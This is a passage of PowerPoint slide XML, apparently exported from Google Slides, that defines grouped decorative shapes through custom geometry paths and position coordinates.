              <a:chExt cx="1295404" cy="3623066"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1124" name="Google Shape;1124;p44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="-7" y="0"/>
                <a:ext cx="643914" cy="3623066"/>
                <a:chOff x="-7" y="0"/>
                <a:chExt cx="643914" cy="3623066"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1125" name="Google Shape;1125;p44"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="201918" y="63821"/>
                  <a:ext cx="72619" cy="101243"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:cxnLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="4011" h="5592" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="3663" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3555" y="1"/>
                        <a:pt x="3449" y="56"/>
                        <a:pt x="3384" y="153"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="76" y="5090"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="5241"/>
                        <a:pt x="26" y="5441"/>
                        <a:pt x="176" y="5542"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="226" y="5567"/>
                        <a:pt x="276" y="5592"/>
                        <a:pt x="351" y="5592"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="452" y="5592"/>
                        <a:pt x="552" y="5542"/>
                        <a:pt x="602" y="5441"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3910" y="504"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4011" y="354"/>
                        <a:pt x="3960" y="153"/>
                        <a:pt x="3835" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3782" y="17"/>
                        <a:pt x="3722" y="1"/>
                        <a:pt x="3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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="63976" y="15434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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="111628" y="3180578"/>
                  <a:ext cx="60362" cy="108177"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:cxnLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="3334" h="5975" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="2984" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2870" y="1"/>
                        <a:pt x="2759" y="57"/>
                        <a:pt x="2707" y="160"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="75" y="5524"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="5674"/>
                        <a:pt x="75" y="5850"/>
                        <a:pt x="226" y="5925"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="276" y="5950"/>
                        <a:pt x="326" y="5975"/>
                        <a:pt x="351" y="5975"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="476" y="5975"/>
                        <a:pt x="577" y="5900"/>
                        <a:pt x="652" y="5800"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3258" y="436"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3333" y="286"/>
                        <a:pt x="3283" y="110"/>
                        <a:pt x="3133" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3086" y="12"/>
                        <a:pt x="3035" y="1"/>
                        <a:pt x="29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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="370258" y="4858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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="88472" y="25155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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="376818" y="3564044"/>
                  <a:ext cx="59004" cy="59022"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:cxnLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="3259" h="3260" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="1629" y="627"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2180" y="627"/>
                        <a:pt x="2632" y="1079"/>
                        <a:pt x="2632" y="1630"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2632" y="2181"/>
                        <a:pt x="2180" y="2632"/>
                        <a:pt x="1629" y="2632"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1078" y="2632"/>
                        <a:pt x="627" y="2181"/>
                        <a:pt x="627" y="1630"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="627" y="1079"/>
                        <a:pt x="1078" y="627"/>
                        <a:pt x="1629" y="627"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1629" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="727" y="1"/>
                        <a:pt x="0" y="728"/>
                        <a:pt x="0" y="1630"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="2532"/>
                        <a:pt x="727" y="3259"/>
                        <a:pt x="1629" y="3259"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2531" y="3259"/>
                        <a:pt x="3258" y="2532"/>
                        <a:pt x="3258" y="1630"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3258" y="728"/>
                        <a:pt x="2531"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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="196921" y="2238919"/>
                  <a:ext cx="22722" cy="22975"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:cxnLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="1255" h="1269" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="625" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="461" y="0"/>
                        <a:pt x="295" y="72"/>
                        <a:pt x="176" y="191"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="216"/>
                        <a:pt x="126" y="241"/>
                        <a:pt x="101" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="76" y="317"/>
                        <a:pt x="51" y="342"/>
                        <a:pt x="51" y="392"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="417"/>
                        <a:pt x="26" y="467"/>
                        <a:pt x="1" y="517"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="542"/>
                        <a:pt x="1" y="592"/>
                        <a:pt x="1" y="642"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="793"/>
                        <a:pt x="51" y="943"/>
                        <a:pt x="176" y="1068"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="302" y="1194"/>
                        <a:pt x="452" y="1269"/>
                        <a:pt x="627" y="1269"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="778" y="1269"/>
                        <a:pt x="953" y="1194"/>
                        <a:pt x="1054" y="1068"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1179" y="943"/>
                        <a:pt x="1254" y="793"/>
                        <a:pt x="1254" y="642"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1254" y="592"/>
                        <a:pt x="1254" y="542"/>
                        <a:pt x="1229" y="517"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1229" y="467"/>
                        <a:pt x="1204" y="417"/>
                        <a:pt x="1204" y="392"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1179" y="342"/>
                        <a:pt x="1154" y="317"/>
                        <a:pt x="1154" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1129" y="241"/>
                        <a:pt x="1104" y="216"/>
                        <a:pt x="1054" y="191"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1028" y="166"/>
                        <a:pt x="1003" y="141"/>
                        <a:pt x="978" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="928" y="91"/>
                        <a:pt x="903" y="66"/>
                        <a:pt x="853" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="828" y="41"/>
                        <a:pt x="778" y="16"/>
                        <a:pt x="753" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="711" y="5"/>
                        <a:pt x="668" y="0"/>
                        <a:pt x="6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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="603052" y="0"/>
                  <a:ext cx="22704" cy="22595"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:cxnLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="1254" h="1248" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="614" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="451" y="0"/>
                        <a:pt x="288" y="57"/>
                        <a:pt x="176" y="169"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="194"/>
                        <a:pt x="125" y="219"/>
                        <a:pt x="100" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="295"/>
                        <a:pt x="50" y="320"/>
                        <a:pt x="50" y="370"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="395"/>
                        <a:pt x="0" y="445"/>
                        <a:pt x="0" y="495"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="520"/>
                        <a:pt x="0" y="570"/>
                        <a:pt x="0" y="620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="771"/>
                        <a:pt x="50" y="946"/>
                        <a:pt x="176" y="1047"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="301" y="1172"/>
                        <a:pt x="451" y="1247"/>
                        <a:pt x="627" y="1247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="777" y="1247"/>
                        <a:pt x="952" y="1172"/>
                        <a:pt x="1053" y="1047"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1178" y="946"/>
                        <a:pt x="1253" y="771"/>
                        <a:pt x="1253" y="620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1253" y="570"/>
                        <a:pt x="1228" y="520"/>
                        <a:pt x="1228" y="495"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1228" y="445"/>
                        <a:pt x="1203" y="395"/>
                        <a:pt x="1203" y="370"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1178" y="320"/>
                        <a:pt x="1153" y="295"/>
                        <a:pt x="1128" y="270"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1103" y="219"/>
                        <a:pt x="1078" y="194"/>
                        <a:pt x="1053" y="169"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="940" y="57"/>
                        <a:pt x="777"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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="-7" y="1029179"/>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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="341846" y="9701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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="584884" y="20180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4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="507951" y="28901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7" name="Google Shape;1137;p44"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="853926" y="2268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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1272693" y="165079"/>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 name="Google Shape;1139;p44"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="294125" y="4807625"/>
              <a:ext cx="425883" cy="216100"/>
              <a:chOff x="259675" y="4807625"/>
              <a:chExt cx="425883" cy="216100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1140" name="Google Shape;1140;p44"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="538673" y="4807625"/>
                <a:ext cx="146885" cy="216100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3510" h="5164" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2131" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="5164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1379" y="5164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="399195" y="4807625"/>
                <a:ext cx="145797" cy="216100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3484" h="5164" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2105" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="5164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="5164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="259675" y="4807625"/>
                <a:ext cx="145839" cy="216100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3485" h="5164" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2131" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="5164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1379" y="5164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3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30">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1143"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1144" name="Google Shape;1144;p45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="-323200" y="4603363"/>
            <a:ext cx="2758303" cy="193976"/>
            <a:chOff x="-344350" y="4817800"/>
            <a:chExt cx="2758303" cy="193976"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1145" name="Google Shape;1145;p45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1676492" y="4830170"/>
              <a:ext cx="92660" cy="91419"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1880" h="1855" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1993939" y="4830170"/>
              <a:ext cx="91428" cy="91419"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1855" h="1855" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299014" y="4817800"/>
              <a:ext cx="114938" cy="114927"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2332" h="2332" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1880" y="477"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1880" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="477"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="226" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="1"/>
                    <a:pt x="1" y="126"/>
                    <a:pt x="1" y="251"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="2106"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2231"/>
                    <a:pt x="101" y="2331"/>
                    <a:pt x="226" y="2331"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2106" y="2331"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2231" y="2331"/>
                    <a:pt x="2332" y="2231"/>
                    <a:pt x="2332" y="2106"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2332" y="251"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2332" y="126"/>
                    <a:pt x="2231" y="1"/>
                    <a:pt x="21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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-344350" y="4864717"/>
              <a:ext cx="2033307" cy="147059"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="41254" h="2984" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="31229" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31179" y="1"/>
                    <a:pt x="31103" y="26"/>
                    <a:pt x="31078" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28622" y="2507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="2507"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="2507"/>
                    <a:pt x="0" y="2633"/>
                    <a:pt x="0" y="2758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2883"/>
                    <a:pt x="101" y="2983"/>
                    <a:pt x="226" y="2983"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28722" y="2983"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="28772" y="2983"/>
                    <a:pt x="28848" y="2958"/>
                    <a:pt x="28898" y="2908"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="31329" y="477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41028" y="477"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="41154" y="477"/>
                    <a:pt x="41254" y="352"/>
                    <a:pt x="41254" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41254" y="101"/>
                    <a:pt x="41154" y="1"/>
                    <a:pt x="410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45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="8589197" y="1197104"/>
            <a:ext cx="584466" cy="3946393"/>
            <a:chOff x="8559523" y="791447"/>
            <a:chExt cx="584466" cy="3946393"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1150" name="Google Shape;1150;p45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8559523" y="273560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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8955190" y="4621461"/>
              <a:ext cx="36789" cy="116379"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2032" h="6428" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="347" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="0"/>
                    <a:pt x="300" y="4"/>
                    <a:pt x="277" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="62"/>
                    <a:pt x="1" y="212"/>
                    <a:pt x="26" y="388"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1379" y="6202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1430" y="6327"/>
                    <a:pt x="1555" y="6428"/>
                    <a:pt x="1680" y="6428"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1755" y="6428"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1931" y="6378"/>
                    <a:pt x="2031" y="6227"/>
                    <a:pt x="2006" y="6052"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="653" y="237"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="610" y="110"/>
                    <a:pt x="47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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8623363" y="4301955"/>
              <a:ext cx="60380" cy="108087"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="5970" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2985" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2871" y="0"/>
                    <a:pt x="2763" y="70"/>
                    <a:pt x="2708" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5519"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5669"/>
                    <a:pt x="51" y="5870"/>
                    <a:pt x="201" y="5945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="5970"/>
                    <a:pt x="302" y="5970"/>
                    <a:pt x="352" y="5970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="5970"/>
                    <a:pt x="577" y="5920"/>
                    <a:pt x="627" y="5794"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3259" y="456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="306"/>
                    <a:pt x="3259" y="105"/>
                    <a:pt x="3109" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3068" y="10"/>
                    <a:pt x="3026" y="0"/>
                    <a:pt x="2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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9016004" y="2994926"/>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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8736973" y="19643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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9121267" y="3702904"/>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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9034598" y="1818952"/>
              <a:ext cx="22722" cy="22993"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="603" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="1" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="968"/>
                    <a:pt x="176" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="628" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="1269"/>
                    <a:pt x="703" y="1244"/>
                    <a:pt x="728" y="1244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1244"/>
                    <a:pt x="828" y="1219"/>
                    <a:pt x="853" y="1219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="903" y="1194"/>
                    <a:pt x="928" y="1169"/>
                    <a:pt x="953" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="1119"/>
                    <a:pt x="1029" y="1094"/>
                    <a:pt x="1054" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="968"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1229" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1129" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="241"/>
                    <a:pt x="1079" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
